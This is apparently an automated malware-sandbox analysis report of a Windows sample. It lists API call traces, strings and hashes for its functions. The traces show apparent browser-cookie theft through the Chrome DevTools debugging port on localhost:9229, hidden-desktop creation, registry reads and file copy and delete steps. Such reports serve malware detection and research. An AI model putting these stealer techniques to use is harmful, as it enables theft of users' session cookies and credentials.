Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8

Function 009E5E47 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5E7C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009E5EAB
lstrcpy.KERNEL32(00000000,00000000), ref: 009E5EDC
lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F04
lstrcat.KERNEL32(00000000,00000000), ref: 009E5F0F
lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F37
lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F6F
lstrcat.KERNEL32(00000000,00000000), ref: 009E5F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F9F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5FD5
lstrcpy.KERNEL32(00000000,00000000), ref: 009E5FFD
lstrcat.KERNEL32(00000000,00000000), ref: 009E6008
lstrcpy.KERNEL32(00000000,00000000), ref: 009E602F
lstrlen.KERNEL32(00431D64), ref: 009E6041
lstrcpy.KERNEL32(00000000,00000000), ref: 009E6060
lstrcat.KERNEL32(00000000,00431D64), ref: 009E606C
lstrlen.KERNEL32(00638DD8), ref: 009E607B
lstrcpy.KERNEL32(00000000,00000000), ref: 009E609E
lstrcat.KERNEL32(00000000,00000000), ref: 009E60A9
lstrcpy.KERNEL32(00000000,00000000), ref: 009E60D3
lstrcpy.KERNEL32(00000000,00000000), ref: 009E60FF
GetFileAttributesA.KERNEL32(00000000), ref: 009E6106
lstrcpy.KERNEL32(00000000,?), ref: 009E615E
lstrcpy.KERNEL32(00000000,?), ref: 009E61CD
lstrcpy.KERNEL32(00000000,?), ref: 009E61FF
lstrcpy.KERNEL32(00000000,?), ref: 009E6242
lstrcpy.KERNEL32(00000000,00000000), ref: 009E626E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E62A6
lstrcpy.KERNEL32(00000000,?), ref: 009E6318
lstrcpy.KERNEL32(00000000,00000000), ref: 009E633C

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
String ID:
API String ID: 2428362635-0
Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction ID: 1a31d6f6cc3b4fb2692509f1dec9335ef602661935844461b8c882e19640e6ba
Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction Fuzzy Hash: 5202A371A012959BCB22EF69CC89BAE7BF9EF94304F048529F805A7351DB74DD41CB90

Function 004092E0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155

strlen.MSVCRT ref: 00409311
strlen.MSVCRT ref: 0040932A

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

memset.MSVCRT ref: 00409371
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
lstrcatA.KERNEL32(?,00000000), ref: 004093A2
strlen.MSVCRT ref: 004093C9
strlen.MSVCRT ref: 00409416
memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
memset.MSVCRT ref: 00409562
lstrcatA.KERNEL32(?,cookies), ref: 00409577
lstrcatA.KERNEL32(?,00431D64), ref: 00409589
lstrcatA.KERNEL32(?,?), ref: 0040959A
lstrcatA.KERNEL32(?,00435160), ref: 004095AC
lstrcatA.KERNEL32(?,?), ref: 004095BD
lstrcatA.KERNEL32(?,.txt), ref: 004095CF
lstrlenA.KERNEL32(?), ref: 004095E6
lstrlenA.KERNEL32(?), ref: 0040960B
lstrcpy.KERNEL32(00000000,?), ref: 00409644
memset.MSVCRT ref: 0040968C

Strings

.txt, xrefs: 004095C3
/devtools, xrefs: 00409325, 00409330
cookies, xrefs: 0040956B
ws://localhost:9229, xrefs: 00409380
localhost, xrefs: 004092FA, 00409318

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2819545660-3542011879
Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98

Function 009E4987 Relevance: 39.3, APIs: 26, Instructions: 334stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E49BA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E49ED
lstrcpy.KERNEL32(00000000,?), ref: 009E4A15
lstrcat.KERNEL32(00000000,00000000), ref: 009E4A20
lstrlen.KERNEL32(004352B8), ref: 009E4A2B
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4A48
lstrcat.KERNEL32(00000000,004352B8), ref: 009E4A54
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4A7D
lstrcat.KERNEL32(00000000,00000000), ref: 009E4A88
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4AAF
lstrcpy.KERNEL32(00000000,?), ref: 009E4AEE
lstrcat.KERNEL32(00000000,?), ref: 009E4AF6
lstrlen.KERNEL32(00431D64), ref: 009E4B01
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4B1E
lstrcat.KERNEL32(00000000,00431D64), ref: 009E4B2A
lstrlen.KERNEL32(004352CC), ref: 009E4B35
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4B52
lstrcat.KERNEL32(00000000,004352CC), ref: 009E4B5E
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4B85
lstrcpy.KERNEL32(00000000,?), ref: 009E4BB7
GetFileAttributesA.KERNEL32(00000000), ref: 009E4BBE
lstrcpy.KERNEL32(00000000,?), ref: 009E4C18
lstrcpy.KERNEL32(00000000,?), ref: 009E4C41
lstrcpy.KERNEL32(00000000,?), ref: 009E4C6A
lstrcpy.KERNEL32(00000000,?), ref: 009E4C92
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E4CC6

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
String ID:
API String ID: 1033685851-0
Opcode ID: 3860177a80801d667d4d5f47abfe203d36ef156e54d336ed77d13172b69f2413
Instruction ID: a86d75d5823592ae4f3d8849a62f44338f0755fdde5b0203dcc4c18084ab413a
Opcode Fuzzy Hash: 3860177a80801d667d4d5f47abfe203d36ef156e54d336ed77d13172b69f2413
Instruction Fuzzy Hash: 91B1A070A412869BCB21AF75CD49BAE7BE9EF85304F14442AF805E7351DB78DC00DBA4

Function 009F1E37 Relevance: 39.2, APIs: 26, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 009F6680
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 009F6699
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 009F66B1
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 009F66C9
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 009F66E2
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 009F66FA
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 009F6712
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 009F672B
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 009F6743
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 009F675B
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 009F6774
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 009F678C
Part of subcall function 009F6627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 009F67A4

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F1E76
GetUserDefaultLangID.KERNEL32 ref: 009F1E7C

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: AddressProc$DefaultLangUserlstrcpy
String ID:
API String ID: 4154271814-0
Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction ID: 06869946417dc71e52af865a9a78a27ae0e904a05168bc7f63eb214f6f224392
Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction Fuzzy Hash: C2616D3150020AEBDB21AFB4DC89B7E7BBAEF85745F145029FA05A7261DF749801DBA0

Function 009D9A03 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 238stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 009D9A3F
lstrcat.KERNEL32(?,?), ref: 009D9A54
lstrcat.KERNEL32(?,0043516C), ref: 009D9A67

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

wsprintfA.USER32 ref: 009D9AAD
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009D9AD0
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009D9AEF
memset.MSVCRT ref: 009D9B0D
lstrcat.KERNEL32(?,?), ref: 009D9B22
lstrcat.KERNEL32(?,?), ref: 009D9B34
lstrcat.KERNEL32(?,00435128), ref: 009D9B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009D9B81
lstrcpy.KERNEL32(00000000,?), ref: 009D9BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 009D9BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009D9BE9
lstrlen.KERNEL32(?), ref: 009D9BFD
wsprintfA.USER32 ref: 009D9C0D
lstrcpy.KERNEL32(?,?), ref: 009D9C24
memset.MSVCRT ref: 009D9C3A

Strings

D, xrefs: 009D9C51

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: D
API String ID: 171495903-2746444292
Opcode ID: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
Instruction ID: 4c9d8bb90545433a71179341248267f380d925bc918bea561a594dc8fb7c48cf
Opcode Fuzzy Hash: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
Instruction Fuzzy Hash: D89182B1644344AFD724EF64DC45FAB77E9EF88700F10891EF64987291DBB4A904CBA2

Function 009D9A07 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 235stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 009D9A3F
lstrcat.KERNEL32(?,?), ref: 009D9A54
lstrcat.KERNEL32(?,0043516C), ref: 009D9A67

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

wsprintfA.USER32 ref: 009D9AAD
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009D9AD0
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009D9AEF
memset.MSVCRT ref: 009D9B0D
lstrcat.KERNEL32(?,?), ref: 009D9B22
lstrcat.KERNEL32(?,?), ref: 009D9B34
lstrcat.KERNEL32(?,00435128), ref: 009D9B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009D9B81
lstrcpy.KERNEL32(00000000,?), ref: 009D9BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 009D9BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 009D9BE9
lstrlen.KERNEL32(?), ref: 009D9BFD
wsprintfA.USER32 ref: 009D9C0D
lstrcpy.KERNEL32(?,?), ref: 009D9C24
memset.MSVCRT ref: 009D9C3A

Strings

D, xrefs: 009D9C51

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: D
API String ID: 171495903-2746444292
Opcode ID: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
Instruction ID: fa12d0eb8b071cb9db881bf6814f2349f0b0468f56f2e7ddca2c50d59e67ce8e
Opcode Fuzzy Hash: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
Instruction Fuzzy Hash: D69172B1644340AFD720EF64DC45FAB77E9EF88704F10891EF64987291DBB4A904CBA6

Function 00421800 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
lstrlenA.KERNEL32(00A543A8,00000000,00000000,?,?,00421B61), ref: 00421840
lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
lstrlenA.KERNEL32(00A543B8,?,?,00421B61), ref: 00421925
lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
lstrlenA.KERNEL32(00A543C8,?,?,00421B61), ref: 00421A0A
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
lstrlenA.KERNEL32(00A76AD0,?,?,00421B61), ref: 00421A81
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4

Function 009D12D7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009D12F1

Part of subcall function 009D1267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D127C
Part of subcall function 009D1267: RtlAllocateHeap.NTDLL(00000000), ref: 009D1283
Part of subcall function 009D1267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 009D12A0
Part of subcall function 009D1267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 009D12BA
Part of subcall function 009D1267: RegCloseKey.ADVAPI32(?), ref: 009D12C4

lstrcat.KERNEL32(?,00000000), ref: 009D1307
lstrlen.KERNEL32(?), ref: 009D1314
lstrcat.KERNEL32(?,00431D48), ref: 009D132F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1366
lstrlen.KERNEL32(006389F0), ref: 009D1374
lstrcpy.KERNEL32(00000000,?), ref: 009D1398
lstrcat.KERNEL32(00000000,006389F0), ref: 009D13A0
lstrlen.KERNEL32(00431D50), ref: 009D13AB
lstrcpy.KERNEL32(00000000,00000000), ref: 009D13CF
lstrcat.KERNEL32(00000000,00431D50), ref: 009D13DB
lstrcpy.KERNEL32(00000000,00000000), ref: 009D1401
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1446
lstrlen.KERNEL32(00638CA4), ref: 009D1455
lstrcpy.KERNEL32(00000000,?), ref: 009D147C
lstrcat.KERNEL32(00000000,?), ref: 009D1484
lstrcpy.KERNEL32(00000000,00000000), ref: 009D14BF
lstrcat.KERNEL32(00000000), ref: 009D14CC
lstrcpy.KERNEL32(00000000,00000000), ref: 009D14F3
CopyFileA.KERNEL32(?,?,00000001), ref: 009D151C
lstrcpy.KERNEL32(00000000,?), ref: 009D1548
lstrcpy.KERNEL32(00000000,?), ref: 009D1584

Part of subcall function 009EF197: lstrcpy.KERNEL32(00000000,?), ref: 009EF1C9

DeleteFileA.KERNEL32(?), ref: 009D15B8
memset.MSVCRT ref: 009D15D5

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
String ID:
API String ID: 1397529057-0
Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction ID: 1080cc61d5b6ff01554821d9d1a1ffb26e5898fa200731f973008a9086af4a0b
Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction Fuzzy Hash: C4A15171A41245ABCB21AF74DC89FAEBBB9EF85304F048426F905A7351DB78DD01DBA0

Function 009EAE79 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 009EAE96
lstrlen.KERNEL32(00638DD4), ref: 009EAEAC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EAED4
lstrcat.KERNEL32(00000000,00000000), ref: 009EAEDF
lstrcpy.KERNEL32(00000000,00000000), ref: 009EAF08
lstrcpy.KERNEL32(00000000,00000000), ref: 009EAF4B
lstrcat.KERNEL32(00000000,00000000), ref: 009EAF55
lstrcpy.KERNEL32(00000000,00000000), ref: 009EAF7E
lstrlen.KERNEL32(0043509C), ref: 009EAF98
lstrcpy.KERNEL32(00000000,00000000), ref: 009EAFBA
lstrcat.KERNEL32(00000000,0043509C), ref: 009EAFC6
lstrcpy.KERNEL32(00000000,00000000), ref: 009EAFEF
lstrlen.KERNEL32(0043509C), ref: 009EB001
lstrcpy.KERNEL32(00000000,00000000), ref: 009EB023
lstrcat.KERNEL32(00000000,0043509C), ref: 009EB02F
lstrcpy.KERNEL32(00000000,00000000), ref: 009EB058
lstrlen.KERNEL32(00638DB8), ref: 009EB06E
lstrcpy.KERNEL32(00000000,00000000), ref: 009EB096
lstrcat.KERNEL32(00000000,00000000), ref: 009EB0A1
lstrcpy.KERNEL32(00000000,00000000), ref: 009EB0CA
lstrcpy.KERNEL32(00000000,?), ref: 009EB106
lstrcat.KERNEL32(00000000,00000000), ref: 009EB110
lstrcpy.KERNEL32(00000000,00000000), ref: 009EB136
lstrlen.KERNEL32(00000000), ref: 009EB14C
lstrcpy.KERNEL32(00000000,00638A98), ref: 009EB17F

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen
String ID:
API String ID: 2762123234-0
Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction ID: 839f1de2a460fe1d1fd9a9f969b4fb16117ea6911ae3b9aab21c34b7432bf184
Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction Fuzzy Hash: 13B15E709016569BCB22AF65CC89BBF77BAFF81305F04452AF814A7261DB78ED00DB91

Function 009F1A67 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F1A96
lstrlen.KERNEL32(00638DEC), ref: 009F1AA7
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1ACE
lstrcat.KERNEL32(00000000,00000000), ref: 009F1AD9
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B08
lstrlen.KERNEL32(00435564), ref: 009F1B1A
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B3B
lstrcat.KERNEL32(00000000,00435564), ref: 009F1B47
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B76
lstrlen.KERNEL32(00638B1C), ref: 009F1B8C
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1BB3
lstrcat.KERNEL32(00000000,00000000), ref: 009F1BBE
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1BED
lstrlen.KERNEL32(00435564), ref: 009F1BFF
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1C20
lstrcat.KERNEL32(00000000,00435564), ref: 009F1C2C
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1C5B
lstrlen.KERNEL32(00638D70), ref: 009F1C71
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1C98
lstrcat.KERNEL32(00000000,00000000), ref: 009F1CA3
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1CD2
lstrlen.KERNEL32(00638D6C), ref: 009F1CE8
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1D0F
lstrcat.KERNEL32(00000000,00000000), ref: 009F1D1A
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1D49

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction ID: 8725581a3fdb8e1afc8f9c17f33188d35206ee85560988e355942b5a345aa5f8
Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction Fuzzy Hash: 6F914DB0640747DFD720AFB5CC88A2AB7EEEF54345F149829B985D3651DB78E840CBA0

Function 009E4D77 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 009E4DAA
LocalAlloc.KERNEL32(00000040,?), ref: 009E4DDC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E4E29
lstrlen.KERNEL32(00435128), ref: 009E4E34
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4E51
